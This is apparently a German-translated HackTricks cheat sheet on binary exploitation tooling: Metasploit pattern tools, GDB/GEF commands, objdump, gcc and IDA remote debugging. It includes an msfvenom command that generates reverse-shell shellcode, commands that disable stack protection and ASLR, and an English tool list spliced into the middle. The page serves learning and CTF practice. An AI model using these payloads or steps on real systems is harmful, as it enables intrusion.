hacktricks/binary-exploitation/basic-binary-exploitation-methodology/tools
2024-04-07 03:07:20 +00:00
..
pwntools.md Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 03:07:20 +00:00
README.md Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-04-07 03:07:20 +00:00

Ausnutzungswerkzeuge

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Metasploit

pattern_create.rb -l 3000   #Length
pattern_offset.rb -l 3000 -q 5f97d534   #Search offset
nasm_shell.rb
nasm> jmp esp   #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01

Shellcodes

Shellcodes sind kleine Stücke von maschinenlesbarem Code, die speziell entwickelt wurden, um als Payload in Exploits und Angriffen verwendet zu werden.

msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c

GDB

Installation

apt-get install gdb

Parameter


Tools

Static Analysis Tools

  • Ghidra: A software reverse engineering (SRE) framework created by the National Security Agency (NSA). It helps analyze compiled code.
  • IDA Pro: A disassembler and debugger used to analyze software.
  • Radare2: A portable reversing framework that can disassemble, debug, analyze, and manipulate binary files.

Dynamic Analysis Tools

  • GDB: The GNU Project debugger that allows you to see what is going on 'inside' another program while it executes.
  • Peda: An enhanced Python Exploit Development Assistance for GDB.
  • Frida: A dynamic code instrumentation toolkit.
  • Strace: A system call tracer that helps in debugging and diagnosing programs.

Fuzzing Tools

  • AFL: American Fuzzy Lop - a security-oriented fuzzer.
  • Peach Fuzzer: A smart fuzzer that generates test cases.
  • Radamsa: A general-purpose fuzzer.
  • BooFuzz: A fork of Sulley Fuzzer.

Exploitation Tools

  • Metasploit: A penetration testing framework that makes hacking simple.
  • ROPgadget: A tool to find ROP gadgets to build rop chains.
  • pwntools: A CTF framework and exploit development library.
  • Immunity Debugger: A powerful new way to write exploits, analyze malware, and reverse engineer binary files.

Network Analysis Tools

  • Wireshark: A network protocol analyzer.
  • Tcpdump: A command-line packet analyzer.
  • Netcat: A utility for reading from and writing to network connections.

Web Application Tools

  • Burp Suite: A graphical tool to testing web application security.
  • SQLMap: An open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.

Miscellaneous Tools

  • Binwalk: A tool for searching binary images for embedded files and executable code.
  • QEMU: A generic and open-source machine emulator and virtualizer.
  • Volatility: An open-source memory forensics framework.

-q # No show banner
-x <file> # Auto-execute GDB instructions from here
-p <pid> # Attach to process

Anleitung

run # Execute
start # Start and break in main
n/next/ni # Execute next instruction (no inside)
s/step/si # Execute next instruction
c/continue # Continue until next breakpoint
p system # Find the address of the system function
set $eip = 0x12345678 # Change value of $eip
help # Get help
quit # exit

# Disassemble
disassemble main # Disassemble the function called main
disassemble 0x12345678 # Disassemble taht address
set disassembly-flavor intel # Use intel syntax
set follow-fork-mode child/parent # Follow child/parent process

# Breakpoints
br func # Add breakpoint to function
br *func+23
br *0x12345678
del <NUM> # Delete that number of breakpoint
watch EXPRESSION # Break if the value changes

# info
info functions --> Info abount functions
info functions func --> Info of the funtion
info registers --> Value of the registers
bt # Backtrace Stack
bt full # Detailed stack
print variable
print 0x87654321 - 0x12345678 # Caculate

# x/examine
examine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero # Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>
x/o 0xDir_hex
x/2x $eip # 2Words from EIP
x/2x $eip -4 # $eip - 4
x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
i r eip # Value of $eip
x/w pointer # Value of the pointer
x/s pointer # String pointed by the pointer
x/xw &pointer # Address where the pointer is located
x/i $eip # Instructions of the EIP

GEF

GEF (GDB Enhanced Features) ist eine GDB-Erweiterung, die verschiedene nützliche Funktionen für das Debuggen und die Analyse von Binärdateien bietet.

help memory # Get help on memory command
canary # Search for canary value in memory
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
xinfo <addr> # Shows page, size, perms, memory area and offset of the addr in the page
memory watch 0x784000 0x1000 byte #Add a view always showinf this memory
got #Check got table
memory watch $_got()+0x18 5 #Watch a part of the got table

# Vulns detection
format-string-helper #Detect insecure format strings
heap-analysis-helper #Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap

#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp

#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61

#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤  i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤  pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely

Tricks

GDB gleiche Adressen

Beim Debuggen hat GDB etwas andere Adressen als die, die vom Binärprogramm verwendet werden, wenn es ausgeführt wird. Sie können GDB dazu bringen, die gleichen Adressen zu haben, indem Sie Folgendes tun:

  • unset env LINES
  • unset env COLUMNS
  • set env _=<Pfad> Geben Sie den absoluten Pfad zum Binärprogramm ein
  • Exploit des Binärprogramms mit dem gleichen absoluten Pfad
  • PWD und OLDPWD müssen gleich sein, wenn Sie GDB verwenden und das Binärprogramm ausnutzen

Backtrace zum Finden von aufgerufenen Funktionen

Bei einem statisch verknüpften Binärprogramm gehören alle Funktionen zum Binärprogramm (und nicht zu externen Bibliotheken). In diesem Fall wird es schwierig sein, den Ablauf zu identifizieren, dem das Binärprogramm folgt, um beispielsweise nach Benutzereingaben zu fragen.
Sie können diesen Ablauf leicht identifizieren, indem Sie das Binärprogramm mit gdb ausführen, bis Sie nach einer Eingabe gefragt werden. Stoppen Sie es dann mit STRG+C und verwenden Sie den Befehl bt (backtrace), um die aufgerufenen Funktionen zu sehen:

gef➤  bt
#0  0x00000000004498ae in ?? ()
#1  0x0000000000400b90 in ?? ()
#2  0x0000000000400c1d in ?? ()
#3  0x00000000004011a9 in ?? ()
#4  0x0000000000400a5a in ?? ()

GDB-Server

gdbserver --multi 0.0.0.0:23947 (in IDA müssen Sie den absoluten Pfad der ausführbaren Datei auf der Linux-Maschine und auf der Windows-Maschine angeben)

Ghidra

Stack-Offset finden

Ghidra ist sehr nützlich, um den Offset für einen Buffer Overflow dank der Informationen über die Position der lokalen Variablen zu finden.
Zum Beispiel zeigt ein Buffer Overflow im local_bc im untenstehenden Beispiel an, dass Sie einen Offset von 0xbc benötigen. Darüber hinaus, wenn local_10 ein Canary-Cookie ist, zeigt dies an, dass es einen Offset von 0xac gibt, um es von local_bc aus zu überschreiben.
Bedenken Sie, dass die ersten 0x08, von wo aus der RIP gespeichert wird, dem RBP gehören.

GCC

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> Kompilieren ohne Schutzmaßnahmen
-o --> Ausgabe
-g --> Code speichern (GDB kann ihn sehen)
echo 0 > /proc/sys/kernel/randomize_va_space --> ASLR in Linux deaktivieren

Um ein Shellcode zu kompilieren:
nasm -f elf assembly.asm --> gibt eine ".o"-Datei zurück
ld assembly.o -o shellcodeout --> Ausführbar

Objdump

-d --> Disassemblieren von ausführbaren Abschnitten (Opcode eines kompilierten Shellcodes sehen, ROP-Gadgets finden, Adressen von Funktionen finden...)
-Mintel --> Intel-Syntax
-t --> Symbol-Tabelle
-D --> Alles disassemblieren (Adresse einer statischen Variable)
-s -j .dtors --> dtors-Abschnitt
-s -j .got --> got-Abschnitt
-D -s -j .plt --> plt-Abschnitt decompiliert
ojdump -t --dynamic-relo ./exec | grep puts --> Adresse von "puts" zum Ändern in GOT
objdump -D ./exec | grep "VAR_NAME" --> Adresse einer statischen Variable (diese sind im DATA-Abschnitt gespeichert).

Core-Dumps

  1. Führen Sie ulimit -c unlimited aus, bevor Sie mein Programm starten
  2. Führen Sie sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t aus
  3. sudo gdb --core=\<path/core> --quiet

Mehr

ldd executable | grep libc.so.6 --> Adresse (bei ASLR ändert sich dies jedes Mal)
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> Schleife, um zu sehen, ob sich die Adresse stark ändert
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> Offset von "system"
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> Offset von "/bin/sh"

strace executable --> Funktionen, die vom ausführbaren Programm aufgerufen werden
rabin2 -i ejecutable --> Adresse aller Funktionen

Inmunity Debugger

!mona modules    #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll   #Search for opcodes insie dll space (JMP ESP)

IDA

Debugging in Remote Linux

Innerhalb des IDA-Ordners finden Sie Binärdateien, die zum Debuggen eines Binärdateis in einem Linux verwendet werden können. Um dies zu tun, verschieben Sie die Binärdatei linux_server oder linux_server64 in den Linux-Server und führen Sie sie im Ordner aus, der die Binärdatei enthält:

./linux_server64 -Ppass

Dann konfigurieren Sie den Debugger: Debugger (Linux Remote) --> Prozessoptionen...:

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: